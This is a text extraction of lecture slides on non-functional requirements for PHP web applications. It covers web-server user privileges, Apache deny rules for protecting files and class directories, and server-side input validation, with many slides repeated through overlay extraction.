Introduction to Non-Functional Requirements on a Web ... · Requirements Non-Functional...

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Introduction to Non-FunctionalRequirements on a Web

ApplicationInternet Applications, ID1354

1 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

ContentsNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

2 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Section

Non-Functional Requirements

Security

Performance

3 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response time

I availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availability

I usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usability

I security (authentication, authorization,integrity, privacy, etc)

I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)

I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional RequirementsI Non-functional requirements are all requirements

that do not concern what the program should do, buthow it should work.

I response timeI availabilityI usabilityI security (authentication, authorization,

integrity, privacy, etc)I and many more.

I Very important to specify non-functionalrequirements before development starts.

I Also very important to meet non-functionalrequirements from the beginning. It is difficult,time-consuming and error-prone to add them last,when the program has all desired functionality.

4 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional Requirements(Cont’d)

I Be realistic when specifying non-functionalrequirements, do not write a wish list.

I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.

I Now, we will look at two groups ofnon-functional requirements: security andperformance.

5 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional Requirements(Cont’d)

I Be realistic when specifying non-functionalrequirements, do not write a wish list.

I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.

I Now, we will look at two groups ofnon-functional requirements: security andperformance.

5 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Non-Functional Requirements(Cont’d)

I Be realistic when specifying non-functionalrequirements, do not write a wish list.

I It must be possible to verify that therequirements are fulfilled. For example, donot write fast enough, but rather first visiblesign of response within 1 second in 99% ofthe calls measured from outer firewall.

I Now, we will look at two groups ofnon-functional requirements: security andperformance.

5 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Section

Non-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

Performance

6 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Security

I There are many different aspects ofsecurity.

I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.

I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.

7 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Security

I There are many different aspects ofsecurity.

I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.

I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.

7 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Security

I There are many different aspects ofsecurity.

I Here, we will look at possible flaws thatopens security holes, which may beexploited for attacks. We will also see howto stop these attacks.

I This is only an introduction to web sitesecurity, to illustrate that problems exist andmust be considered.

7 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

8 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System SecurityI PHP is able to access files, execute

commands and open network connectionson the server.

I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.

I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.

I This is mainly related to configuration, notprogramming, and is therefore serverdependent.

9 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System SecurityI PHP is able to access files, execute

commands and open network connectionson the server.

I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.

I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.

I This is mainly related to configuration, notprogramming, and is therefore serverdependent.

9 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System SecurityI PHP is able to access files, execute

commands and open network connectionson the server.

I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.

I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.

I This is mainly related to configuration, notprogramming, and is therefore serverdependent.

9 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System SecurityI PHP is able to access files, execute

commands and open network connectionson the server.

I This means there are big security holes ifthe PHP interpreter’s access rights are notproperly limited.

I Tools to mitigate this are the web server’suserid, file location, and mechanisms torestrict which files the web server mayaccess.

I This is mainly related to configuration, notprogramming, and is therefore serverdependent.

9 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Web Server UserI We must specify which user the web server shall be

on the local operating system.I To avoid errors related to access rights, it might be

tempting to set the web server’s user id to root oradministrator or another the name of the superuser.

I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.

I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.

I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf

10 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Web Server UserI We must specify which user the web server shall be

on the local operating system.I To avoid errors related to access rights, it might be

tempting to set the web server’s user id to root oradministrator or another the name of the superuser.

I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.

I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.

I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf

10 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Web Server UserI We must specify which user the web server shall be

on the local operating system.I To avoid errors related to access rights, it might be

tempting to set the web server’s user id to root oradministrator or another the name of the superuser.

I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.

I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.

I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf

10 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Web Server UserI We must specify which user the web server shall be

on the local operating system.I To avoid errors related to access rights, it might be

tempting to set the web server’s user id to root oradministrator or another the name of the superuser.

I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.

I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.

I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf

10 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Web Server UserI We must specify which user the web server shall be

on the local operating system.I To avoid errors related to access rights, it might be

tempting to set the web server’s user id to root oradministrator or another the name of the superuser.

I This is not appropriate!! It allows an attacker (orbugs in our code) to perform any malicious action.

I A good advise is to specify a special dedicated userfor the web server, that is not used by anyone else.This way, we can freely tune access rights for theweb server.

I How to specify user (and group) id is server and OSdependent. On apache/unix, it is specified in theenvvars file, which is normally located in thesame directory as apache2.conf

10 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Apache User On Windows

I On Windows, the apache server normallyruns as the LocalSystem user, whichhas no network privileges but wide filesystem privileges.

I The apache documentation, see https://httpd.apache.org/docs/2.2/platform/windows.html#winsvc,recommends creating a new, dedicateduser for the apache service. This documentalso shows how to do that.

11 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Apache User On Windows

I On Windows, the apache server normallyruns as the LocalSystem user, whichhas no network privileges but wide filesystem privileges.

I The apache documentation, see https://httpd.apache.org/docs/2.2/platform/windows.html#winsvc,recommends creating a new, dedicateduser for the apache service. This documentalso shows how to do that.

11 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System AccessI Having restricted the web server to a user

with limited rights, we might get exceptionsbecause the server can not access files itneed.

I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.

I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.

12 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System AccessI Having restricted the web server to a user

with limited rights, we might get exceptionsbecause the server can not access files itneed.

I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.

I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.

12 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

File System AccessI Having restricted the web server to a user

with limited rights, we might get exceptionsbecause the server can not access files itneed.

I Repeatedly facing this problem, we mightbe tempted to release access control andgive all users all rights on the entire website.

I This is not appropriate!! We must, file byfile, decide if the server shall have accessto it. If so, we might set the server user tofile owner.

12 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP AccessI Sometimes it shall be possible to read or include a

file in PHP code, but not to retrieve the file with aHTTP GET request.

I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.

I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.

I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.

1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>

13 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP AccessI Sometimes it shall be possible to read or include a

file in PHP code, but not to retrieve the file with aHTTP GET request.

I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.

I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.

I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.

1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>

13 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP AccessI Sometimes it shall be possible to read or include a

file in PHP code, but not to retrieve the file with aHTTP GET request.

I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.

I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.

I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.

1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>

13 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP AccessI Sometimes it shall be possible to read or include a

file in PHP code, but not to retrieve the file with aHTTP GET request.

I This situation can not be solved by limiting filesystem access. Instead, we have to specify in theserver’s configuration files what it is allowed to do.

I With apache, application specific configuration isdone with a .htaccess file. The content of such afile is valid for the directory where the file is located,and all subdirectories.

I The following entry forbids HTTP access to the fileconversation.txt, where the conversation isstored in the sample chat application.

1 <FilesMatch "conversation.txt">2 Order allow,deny3 Deny from all4 </FilesMatch>

13 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP Access (Cont’d)

I We might want to prohibit HTTP access toan entire directory, not just a file. Directorydirectives must be placed in the apacheconfiguration file, apache2.conf.

I It is a good idea to prohibit access to allPHP classes. It should only be possible todirect HTTP requests to files intended to beaccessed via HTTP.

14 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP Access (Cont’d)

I We might want to prohibit HTTP access toan entire directory, not just a file. Directorydirectives must be placed in the apacheconfiguration file, apache2.conf.

I It is a good idea to prohibit access to allPHP classes. It should only be possible todirect HTTP requests to files intended to beaccessed via HTTP.

14 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP Access (Cont’d)I This can be achieved by placing PHP classes in aclasses directory and specifying the followingentry in apache2.conf.

1 <Directory "/var/www/doc-root/*/classes">2 <Files *>3 Order allow,deny4 Deny from all5 </Files>6 </Directory>

I This applies to all files with a path matching/var/www/doc-root/*/classes/*. Itprohibits access to PHP classes if the web server’sroot directory is /var/www/doc-root and allPHP classes are placed in a classes directory inthe web application root.

15 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Prohibit HTTP Access (Cont’d)I This can be achieved by placing PHP classes in aclasses directory and specifying the followingentry in apache2.conf.

1 <Directory "/var/www/doc-root/*/classes">2 <Files *>3 Order allow,deny4 Deny from all5 </Files>6 </Directory>

I This applies to all files with a path matching/var/www/doc-root/*/classes/*. Itprohibits access to PHP classes if the web server’sroot directory is /var/www/doc-root and allPHP classes are placed in a classes directory inthe web application root.

15 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

SectionNon-Functional Requirements

SecurityFile System SecurityInput FilteringDatabase SecurityPassword EncryptionCross Site Scripting, XSSImpersonation

PerformanceClient-Side ValidationCachingPersistent Connections

16 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Input FilteringI Never trust anything coming from the client,

there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.

I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.

I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.

17 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Input FilteringI Never trust anything coming from the client,

there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.

I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.

I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.

17 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Input FilteringI Never trust anything coming from the client,

there is no such thing as client-sidesecurity. This is very important and solvesmany security problems.

I Do not assume that data, e.g., HTTPparameters, comes from your client code. Itcould come from an attacker.

I It is still appropriate to use client-side datavalidation to improve performance forordinary execution, i.e., no attacks.Client-side validation is faster since norequest is sent to server.

17 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validate Parameters

I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.

I To be strict, all methods should alwaysvalidate all parameters.

I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.

18 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validate Parameters

I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.

I To be strict, all methods should alwaysvalidate all parameters.

I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.

18 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validate Parameters

I Therefore, server-side validation isnecessary, whether there is client-sidevalidation or not. Normally, both are used.

I To be strict, all methods should alwaysvalidate all parameters.

I This not only improves security, but alsoreduces the risk of corrupt data, makes iteasier to find bugs and facilitates errorhandling.

18 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric ValueI HTTP is string based, all data from the client will be

of the string type in server code.I Parameters supposed to contain numbers must be

checked to see that the content really is a number,the following code shows how to validate an integer.

1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }

I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.

I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.

19 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric ValueI HTTP is string based, all data from the client will be

of the string type in server code.I Parameters supposed to contain numbers must be

checked to see that the content really is a number,the following code shows how to validate an integer.

1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }

I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.

I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.

19 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric ValueI HTTP is string based, all data from the client will be

of the string type in server code.I Parameters supposed to contain numbers must be

checked to see that the content really is a number,the following code shows how to validate an integer.

1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }

I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.

I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.

19 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric ValueI HTTP is string based, all data from the client will be

of the string type in server code.I Parameters supposed to contain numbers must be

checked to see that the content really is a number,the following code shows how to validate an integer.

1 if (!empty($_GET[’someParam’])) {2 $someParam = (int) $_GET[’someParam’];3 } else {4 $someParam = 0;5 }

I The empty function on line one returns true if theargument does not exist or equals FALSE.Remember that “”, “0” and 0 equals FALSE.

I The cast (int) on line two converts the argumentto an integer. If the string starts with valid numericdata, this will be the value used. Otherwise, thevalue will be zero.

19 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric Value(Cont’d)

I To access POST data, use _POST insteadof _GET.

I To validate a float parameter, use(float) instead of (int) for casting.

I There are many more casts available forother PHP types, for example (double)and (boolean).

20 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric Value(Cont’d)

I To access POST data, use _POST insteadof _GET.

I To validate a float parameter, use(float) instead of (int) for casting.

I There are many more casts available forother PHP types, for example (double)and (boolean).

20 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a Numeric Value(Cont’d)

I To access POST data, use _POST insteadof _GET.

I To validate a float parameter, use(float) instead of (int) for casting.

I There are many more casts available forother PHP types, for example (double)and (boolean).

20 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a String

I There are many ctype_ functions the canbe used to check the content of a string, forexample:

I ctype_alpha($str) is true if theargument contains only letters.

I ctype_alnum($str) is true if theargument contains only letters or digits.

I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.

I Also use the empty function to check if theparameter is set, as when validating anumber.

21 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a String

I There are many ctype_ functions the canbe used to check the content of a string, forexample:

I ctype_alpha($str) is true if theargument contains only letters.

I ctype_alnum($str) is true if theargument contains only letters or digits.

I ctype_print($str) is true if theargument contains only characters thatproduce output, i.e., no control characters.

I Also use the empty function to check if theparameter is set, as when validating anumber.

21 / 68

Non-FunctionalRequirements

Non-FunctionalRequirements

SecurityFile System Security

Input Filtering

Database Security

Password Encryption

Cross Site Scripting, XSS

Impersonation

PerformanceClient-Side Validation

Caching

Persistent Connections

Validating a String

